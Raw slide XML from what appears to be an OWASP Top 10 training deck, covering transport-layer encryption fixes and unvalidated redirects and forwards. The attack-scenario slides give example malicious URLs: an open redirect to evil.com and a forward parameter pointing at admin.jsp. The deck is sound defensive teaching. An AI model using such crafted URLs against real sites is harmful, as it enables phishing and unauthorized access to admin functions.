        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.</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Encryption (usually SSL) must be used not only for all authenticated connections, especially Internet-accessible web pages, but backend connections as well. </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Encryption should be used whenever sensitive data, such as credit card or health information is transmitted. </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Applications that fall back or can be forced out of an encrypting mode can be abused by attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PCI standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> requires that all credit card information being transmitted over the internet be encrypted.</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42</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60326938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 y="76200"/>
            <a:ext cx="7448128" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Insufficient Transport Layer Protection	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="990600"/>
            <a:ext cx="8151440" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backend and other connections should also use SSL/TLS or other encryption technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configure your SSL/TLS provider to only support strong (FIPS 140-2 compliant) algorithms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure your certificate is valid, not expired, not revoked, and matches all domains used by the site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protect the session cookie by setting the secure bit to 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>javax.servlet.http.Cookie.setSecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(true))</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43</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63399237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0"/>
            <a:ext cx="7448128" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insufficient Transport Layer Protection	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1343744"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Add a security constraint in web.xml for every URL that requires HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;security-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;web-resource-collection&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;web-resource-name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pages requiring HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/web-resource-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;/profile&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;/register&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;/password-login&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-login&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-pattern&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/web-resource-collection&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;user-data-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;transport-guarantee&gt;CONFIDENTIAL&lt;/transport-guarantee&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/user-data-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/security-constraint&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pP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44</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09208644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179140" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A10 –Un-validated Redirects and Forwards </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Redirecting users to a page specified in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attackers can choose destination page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00000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45</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51560601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Attack Scenarios </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The application has a page called “redirect.jsp” which takes a single parameter named “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The application uses forward to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forward the attacker to an administrative function that she would not normally be able to access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/boring.jsp?fwd=admin.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
